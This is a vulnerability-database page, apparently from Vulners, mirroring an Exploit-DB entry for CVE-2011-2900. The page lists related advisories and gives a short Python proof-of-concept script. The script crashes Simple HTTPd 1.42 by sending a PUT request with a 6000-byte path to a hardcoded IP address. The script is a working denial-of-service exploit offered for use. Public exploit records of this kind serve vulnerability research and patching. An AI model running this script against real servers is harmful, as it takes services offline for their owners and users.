Lucene search
+L

Simple HTTPd 1.42 - Denial of Servive

🗓️ 12 Aug 2011 00:00:00Reported by G13Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 49 Views

Simple HTTPd 1.42 - Denial of Service vulnerability exploi

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Simple HTTPd 1.42 PUT Request Remote Buffer Overflow Vulnerability
15 Aug 201100:00
zdt
Circl
CVE-2011-2900
19 Jun 202616:45
circl
CVE
CVE-2011-2900
5 Aug 201121:00
cve
Cvelist
CVE-2011-2900
5 Aug 201121:00
cvelist
Exploit DB
Simple HTTPd 1.42 - 'PUT' Remote Buffer Overflow
15 Aug 201100:00
exploitdb
exploitpack
Simple-HTTPD
8 Sep 201100:00
exploitpack
exploitpack
Simple HTTPd 1.42 - PUT Remote Buffer Overflow
15 Aug 201100:00
exploitpack
Fedora
[SECURITY] Fedora 14 Update: mongoose-3.0-2.fc14
8 Sep 201107:09
fedora
Fedora
[SECURITY] Fedora 16 Update: mongoose-3.0-2.fc16
7 Sep 201103:29
fedora
Fedora
[SECURITY] Fedora 15 Update: mongoose-3.0-2.fc15
8 Sep 201107:04
fedora
Rows per page
#!/usr/bin/python
# Exploit Title: Simple HTTPd 1.42 PoC DoS
# Date: 8/10/2011
# Author: G13
# Software Link:
http://sourceforge.net/projects/shttpd/files/shttpd/1.42/shttpd-1.42.tar.gz/download
# Version: 1.42
# Tested on: WinXP SP1
# CVE : 2011-2900
#
# Since Mongoose HTTPd and Simple HTTPd share similar code, the exploit
still works.
# Simple HTTPd is still affected by the bug. The executable must be
compiled with -DNO_AUTH and -D_DEBUG enabled. I compiled
# under MinGW.

import socket, sys


buf = "A" * 6000

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.1.101',80))

s.send("PUT /" + buf + "/ HTTP/1.0\r\n")
s.send("\r\n")
print s.recv(1024)
s.close()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Aug 2011 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 27.5
EPSS0.13256
49